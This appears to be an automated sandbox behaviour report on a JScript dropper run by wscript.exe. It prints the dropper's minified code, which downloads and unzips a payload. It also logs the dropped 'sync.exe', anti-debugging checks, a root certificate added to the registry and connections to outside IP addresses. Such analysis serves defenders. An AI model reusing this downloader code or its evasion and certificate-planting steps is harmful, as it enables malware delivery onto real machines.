Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: sync.exe, cmd.exe | Binary or memory string: Progman |
Source: sync.exe, cmd.exe | Binary or memory string: Program Manager |
Source: sync.exe, cmd.exe | Binary or memory string: Shell_TrayWnd |
Source: C:\Windows\System32\wscript.exe | File created: sync.exe.0.dr |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, | 5_2_00401170 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, | 5_1_00401170 |
Source: C:\Windows\System32\wscript.exe | System information queried: KernelDebuggerInformation |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00415857 rdtsc | 5_2_00415857 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress, | 5_2_00401500 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system, | 5_2_00401630 |
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00415857 rdtsc | 5_2_00415857 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 3000 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 1000 |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | API coverage: 3.1 % |
Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -240000s >= -60s |
Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -60000s >= -60s |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -3000s >= -60s |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -1000s >= -60s |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004356C7 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary, | 5_2_004356C7 |
Source: C:\Windows\System32\wscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.24.116.148 80 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.27.127.62 187 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004D1780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, | 5_2_004D1780 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00413770 GetStdHandle,GetFileType,_vsnprintf,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,_vsnprintf,WriteFile, | 5_2_00413770 |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004156B0 cpuid | 5_2_004156B0 |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |